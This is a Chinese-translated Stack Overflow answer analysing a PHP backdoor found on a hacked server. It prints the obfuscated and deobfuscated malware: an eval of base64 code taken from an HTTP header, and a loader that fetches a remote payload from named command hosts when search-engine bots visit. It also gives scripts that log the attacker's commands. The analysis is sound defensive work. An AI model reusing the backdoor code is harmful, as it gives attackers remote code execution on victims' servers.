    $I1IIll = $IIlI1I."_init";
    if (@ini_get("allow_url_fopen") == "1") {
      return @file_get_contents("http://" . $I1ll11 . $I11IIl. "&w=fgc");
    } elseif (function_exists($I1IIll)){
      $QO00QO = @$I1IIll();
      $QOOOQQ = $IIlI1I."_setopt";
      $IIl11I = $IIlI1I."_exec";
      @$QOOOQQ($QO00QO, CURLOPT_URL, "http://" . $I1ll11 . $I11IIl. "&w=cu");
      @$QOOOQQ($QO00QO, CURLOPT_HEADER, false);
      @$QOOOQQ($QO00QO, CURLOPT_RETURNTRANSFER, true);
      @$QOOOQQ($QO00QO, CURLOPT_CONNECTTIMEOUT, 6);
      $IIIl1I = @$IIl11I($QO00QO);
      @curl_close($QO00QO);
      if (empty($IIIl1I)) {
        $IIIl1I = "";
      }
      return $IIIl1I;
    } else {
      $Q0OOOQ = @fsockopen($I1ll11, 80, $Il111l, $Q000O0, 5);
      if ($Q0OOOQ) {
        $I111lI = "";
        $I1lI1I = NULL;
        @fputs($Q0OOOQ, "GET {$I11IIl}"."&w=sk HTTP/1.0"."\r\n"."Host: "."{$I1ll11}\r\n");
        $QOOOQO = PHP_OS."/".PHP_VERSION;
        @fputs($Q0OOOQ, "User-Agent: {$QOOOQO}\r\n\r\n");
        while(!w3net_feof($Q0OOOQ, $I1lI1I) && (microtime(true) - $I1lI1I) < 2) {
          $I111lI .= @fgets($Q0OOOQ, 128);
        }
        @fclose($Q0OOOQ);
        $Q000OQ = explode("\r\n\r\n", $I111lI);
        unset($Q000OQ[0]);
        return implode("\r\n\r\n", $Q000OQ);
      }
    }
  }

  function w3net_output($I1I1lI, $I1lIll) {
    echo "Y_".$I1I1lI.":".$I1lIll."\r\n";
  }

  function php_server($Q0000Q){
    return @$_SERVER[$Q0000Q];
  }

  $IlI11l=I11lIl1I(55, 14);
  $I1lll1=I11lIl1I(69, 6);
  $Q0Q0QO=I11lIl1I(78, 23);
  $I1ll11=I11lIl1I(102, 10);
  if (isset($_SERVER[I11lIl1I(114, 7)])) {
    if (@$_SERVER[I11lIl1I(114, 7)] != I11lIl1I(122, 4)) { $I1ll11=I11lIl1I(130, 11); }
  }
  $I1ll11.=strtolower(@$_SERVER[I11lIl1I(142, 12)]);

  foreach ($_GET as $I1I1lI=>$I1lIll) {
    if (strpos($I1lIll,I11lIl1I(157, 7))) {
      $_GET[$I1I1lI]=I11lIl1I(167, 0);
    } elseif (strpos($I1lIll,I11lIl1I(167, 8))) {
      $_GET[$I1I1lI]=I11lIl1I(167, 0);
    }
  }

  if(!isset($_SERVER[I11lIl1I(175, 15)])) {
    $_SERVER[I11lIl1I(175, 15)] = @$_SERVER[I11lIl1I(190, 15)];
    if(isset($_SERVER[I11lIl1I(211, 16)])) {
      $_SERVER[I11lIl1I(175, 15)] .= I11lIl1I(231, 2) . @$_SERVER[I11lIl1I(211, 16)];
    }
  }

  function get_temp_directory() {
    $I11III=dirname(__FILE__).DIRECTORY_SEPARATOR;
    $Q0Q00Q = Array( "/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $I11III."tmp", $I11III."wp-content/uploads", $I11III."wp-content/cache", );

    foreach ($Q0Q00Q as $Q0QOOO){ 
      if (!empty($Q0QOOO)){
        $Q0QOOO.=DIRECTORY_SEPARATOR;
        if (@is_writable($Q0QOOO)) {
          $I11III = $Q0QOOO; break;
        }
      }
    }

    return $I11III;
  }

  if (strlen($I1ll11) < 10) {
    define(I11lIl1I(235, 16), 0);

  } elseif ($Q0OO0O=$I1ll11.@$_SERVER[I11lIl1I(175, 15)]) {
    $QO0O0Q=@md5($I1ll11.PHP_OS.$I1lll1.$Q0Q0QO);
    $w3n_code=get_temp_directory().I11lIl1I(253, 2).$QO0O0Q;
    define(I11lIl1I(235, 16), $w3n_code);
    $IlIlII = $w3n_code.I11lIl1I(257, 6);
    if (@$_SERVER[I11lIl1I(267, 15)]==$QO0O0Q) {
      $QO0QQ0=I11lIl1I(282, 18);
      echo "\r\n";
      w3net_output(I11lIl1I(301, 8), $I1lll1.I11lIl1I(310, 2).$IlI11l.I11lIl1I(314, 6));
      if ($Q00OQO=$QO0QQ0(@$_SERVER[I11lIl1I(321, 16)])){
        @eval($Q00OQO);
        echo "\r\n";
        w3net_output(I11lIl1I(338, 4), I11lIl1I(342, 3));
      }
      exit(0);
    }
    $II11l1 = False;
    $Il11I1 = @strtolower(@$_SERVER[I11lIl1I(346, 20)]);
    foreach (explode(I11lIl1I(366, 2), I11lIl1I(371, 54)) as $QOOQOO) {
      if (strpos($Il11I1, $QOOQOO)!==False) {
        $Il1Il1 = @fopen($w3n_code.I11lIl1I(257, 6), I11lIl1I(430, 2));
        $Ill11I = @urlencode(@$_SERVER[I11lIl1I(175, 15)]);
        @fwrite($Il1Il1, time()."\t".$QOOQOO."\t".$Ill11I."\n");
        @fclose($Il1Il1);
        $II11l1=True;
        break;
      }
    }
    if (@is_file($w3n_code)) {
      @touch($w3n_code);
      @include_once($w3n_code);
    } elseif ($II11l1 === True) {
      $I1Il1I = Array(I11lIl1I(435, 12), I11lIl1I(449, 16));
      if (@touch($w3n_code)) {
        $Q0OO0O=@urlencode($Q0OO0O);
        $I11IIl = I11lIl1I(465, 14).$Q0OO0O.I11lIl1I(482, 4).$QO0O0Q.I11lIl1I(487, 12).$IlI11l.I11lIl1I(503, 4).$I1lll1;
        $QOQOQO = w3net_getfile($I1Il1I[0], $I11IIl);
        @touch($w3n_code);
      }
    }
  } else {
    define(I11lIl1I(235, 16), 1);
  }
}


如我们所见,它使用 I11lIl1I(..)函数再次混淆了一些字符串和函数名称。让我们替换这些: 

if (!defined("determinator")) {
  if (function_exists("ini_set")) { 
    @ini_set("allow_url_fopen", 1);
    @ini_set("display_errors", 0);
  }

  function w3net_feof($Q0OOOQ, &$I1lI1I = NULL) {
    $I1lI1I = microtime(true);
    return feof($Q0OOOQ);
  }

  function w3net_getfile($I1ll11, $I11IIl) {
    $IIlI1I = "curl";
    $I1IIll = $IIlI1I."_init";
    if (@ini_get("allow_url_fopen") == "1") {
      return @file_get_contents("http://" . $I1ll11 . $I11IIl. "&w=fgc");
    } elseif (function_exists($I1IIll)){
      $QO00QO = @$I1IIll();
      $QOOOQQ = $IIlI1I."_setopt";
      $IIl11I = $IIlI1I."_exec";
      @$QOOOQQ($QO00QO, CURLOPT_URL, "http://" . $I1ll11 . $I11IIl. "&w=cu");
      @$QOOOQQ($QO00QO, CURLOPT_HEADER, false);
      @$QOOOQQ($QO00QO, CURLOPT_RETURNTRANSFER, true);
      @$QOOOQQ($QO00QO, CURLOPT_CONNECTTIMEOUT, 6);
      $IIIl1I = @$IIl11I($QO00QO);
      @curl_close($QO00QO);
      if (empty($IIIl1I)) {
        $IIIl1I = "";
      }
      return $IIIl1I;
    } else {
      $Q0OOOQ = @fsockopen($I1ll11, 80, $Il111l, $Q000O0, 5);
      if ($Q0OOOQ) {
        $I111lI = "";
        $I1lI1I = NULL;
        @fputs($Q0OOOQ, "GET {$I11IIl}"."&w=sk HTTP/1.0"."\r\n"."Host: "."{$I1ll11}\r\n");
        $QOOOQO = PHP_OS."/".PHP_VERSION;
        @fputs($Q0OOOQ, "User-Agent: {$QOOOQO}\r\n\r\n");
        while(!w3net_feof($Q0OOOQ, $I1lI1I) && (microtime(true) - $I1lI1I) < 2) {
          $I111lI .= @fgets($Q0OOOQ, 128);
        }
        @fclose($Q0OOOQ);
        $Q000OQ = explode("\r\n\r\n", $I111lI);
        unset($Q000OQ[0]);
        return implode("\r\n\r\n", $Q000OQ);
      }
    }
  }

  function w3net_output($I1I1lI, $I1lIll) {
    echo "Y_".$I1I1lI.":".$I1lIll."\r\n";
  }

  function php_server($Q0000Q){
    return @$_SERVER[$Q0000Q];
  }

  $IlI11l="ftp/201309";
  $I1lll1="3.01";
  $Q0Q0QO="QQ0OQ000000Q0OQ0Q";
  $I1ll11="http://";
  if (isset($_SERVER["HTTPS"])) {
    if (@$_SERVER["HTTPS"] != "off") { $I1ll11="https://"; }
  }
  $I1ll11.=strtolower(@$_SERVER["HTTP_HOST"]);

  foreach ($_GET as $I1I1lI=>$I1lIll) {
    if (strpos($I1lIll,"union")) {
      $_GET[$I1I1lI]="";
    } elseif (strpos($I1lIll,"select")) {
      $_GET[$I1I1lI]="";
    }
  }

  if(!isset($_SERVER["REQUEST_URI"])) {
    $_SERVER["REQUEST_URI"] = @$_SERVER["SCRIPT_NAME"];
    if(isset($_SERVER["QUERY_STRING"])) {
      $_SERVER["REQUEST_URI"] .= "?" . @$_SERVER["QUERY_STRING"];
    }
  }

  function get_temp_directory() {
    $I11III=dirname(__FILE__).DIRECTORY_SEPARATOR;
    $Q0Q00Q = Array( "/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $I11III."tmp", $I11III."wp-content/uploads", $I11III."wp-content/cache", );

    foreach ($Q0Q00Q as $Q0QOOO){ 
      if (!empty($Q0QOOO)){
        $Q0QOOO.=DIRECTORY_SEPARATOR;
        if (@is_writable($Q0QOOO)) {
          $I11III = $Q0QOOO; break;
        }
      }
    }

    return $I11III;
  }

  if (strlen($I1ll11) < 10) {
    define("determinator", 0);

  } elseif ($Q0OO0O=$I1ll11.@$_SERVER["REQUEST_URI"]) {
    $QO0O0Q=@md5($I1ll11.PHP_OS.$I1lll1.$Q0Q0QO);
    $w3n_code=get_temp_directory().".".$QO0O0Q;
    define("determinator", $w3n_code);
    $IlIlII = $w3n_code.".log";
    if (@$_SERVER["HTTP_Y_AUTH"]==$QO0O0Q) {
      $QO0QQ0="base64_decode";
      echo "\r\n";
      w3net_output("versio", $I1lll1."-".$IlI11l."-php");
      if ($Q00OQO=$QO0QQ0(@$_SERVER["HTTP_EXECPHP"])){
        @eval($Q00OQO);
        echo "\r\n";
        w3net_output("out", "ok");
      }
      exit(0);
    }
    $II11l1 = False;
    $Il11I1 = @strtolower(@$_SERVER["HTTP_USER_AGENT"]);
    foreach (explode(",", "google,yahoo,baidu,bingbot,msnbot,yandex") as $QOOQOO) {
      if (strpos($Il11I1, $QOOQOO)!==False) {
        $Il1Il1 = @fopen($w3n_code.".log", "a");
        $Ill11I = @urlencode(@$_SERVER["REQUEST_URI"]);
        @fwrite($Il1Il1, time()."\t".$QOOQOO."\t".$Ill11I."\n");
        @fclose($Il1Il1);
        $II11l1=True;
        break;
      }
    }
    if (@is_file($w3n_code)) {
      @touch($w3n_code);
      @include_once($w3n_code);
    } elseif ($II11l1 === True) {
      $I1Il1I = Array("sezqo.net", "fastaddz.com");
      if (@touch($w3n_code)) {
        $Q0OO0O=@urlencode($Q0OO0O);
        $I11IIl = "/w3.php?u=".$Q0OO0O."&k=".$QO0O0Q."&t=php&p=".$IlI11l."&v=".$I1lll1;
        $QOQOQO = w3net_getfile($I1Il1I[0], $I11IIl);
        @touch($w3n_code);
      }
    }
  } else {
    define("determinator", 1);
  }
}


再次使用一些字符串代替函数名称等。我替换了这些字符串以使代码再次可读。结果:在“解码和清理脚本”部分中找到了脚本。

获取远程脚本

以下脚本实现了特洛伊木马协议,但不是执行代码,而是将其记录到文件中。最好更改 $hash(例如,使用 http://www.md5.cz/生成有效的md5哈希值)-两个脚本中的值必须相等!

将两个脚本都存储在可从Internet访问的位置。将$ fn =“ evilphpcode-”。$ N.txt“;更改为脚本可以创建文件的路径!从浏览器中调用该脚本,它应该显示” Hi there ;-)“。将第二个脚本的$ url设置为此URL。它将向“网络”发送虚假请求。从浏览器中调用它,然后看到“确定,请求已发送!”。现在,脚本会将传入的“执行请求”记录到文件中,这可能需要一段时间。然后让我们知道里面有什么!

第一个脚本(记录): 

<?php   
$hash = "c1a227ac6f77c4ad098144a61dd906a0";

$code = base64_decode(@$_SERVER["HTTP_EXECPHP"]);
$auth = $_SERVER["HTTP_Y_AUTH"];

function store() {
  global $code, $auth;
  for($N=1; file_exists($fn);++$N) { $fn = "evilphpcode-".$N.txt"; }
  file_put_contents($fn, $code);
  file_put_contents($fn."-hash", $auth);
}

if ($auth != $hash) { echo "Hi there ;-)"; store(); exit(0); }

$version1="ftp/201309"; $version2="3.01";
function out($key, $val) { echo "Y_".$key.":".$val."\r\n"; }
out("versio", $version2."-".$version1."-php");
sleep(1); store();
echo "\r\n";
out("out", "ok");

?>


第二个脚本(请求): 

<?php
$hash = "c1a227ac6f77c4ad098144a61dd906a0";
$url = "http://mydomain.com/path/toscript/script.php"; // <-- put in first scripts location!!!

$url = urlencode($url);
$urltofetch = "http://sezqo.net/w3.php?u=".$url."&k=".$hash."&t=php&p=".$version1."&v=".$version2;
$data = file_get_contents($urltofetch);
echo "OK, request sent!";
?>

关于php - 我的服务器被黑客入侵,注入(inject)了编码代码。我不知道这段代码的目的是什么?请任何人帮助我,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/20095387/

27 4 0
文章推荐: asp.net-mvc - 如何将其他表单数据与 MVC 文件上传一起传递?
文章推荐: regex - perl 中的 split 函数应该如何工作?
文章推荐: sql - 如何使用 unpivot 函数在其他列中查找最小值来忽略字符串值
文章推荐: css - 是否可以仅使用 CSS 自动调整输入文本和文本区域的大小或自动增长?
行者123
个人简介

我是一名优秀的程序员,十分优秀!

滴滴打车优惠券免费领取
滴滴打车优惠券
全站热门文章
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com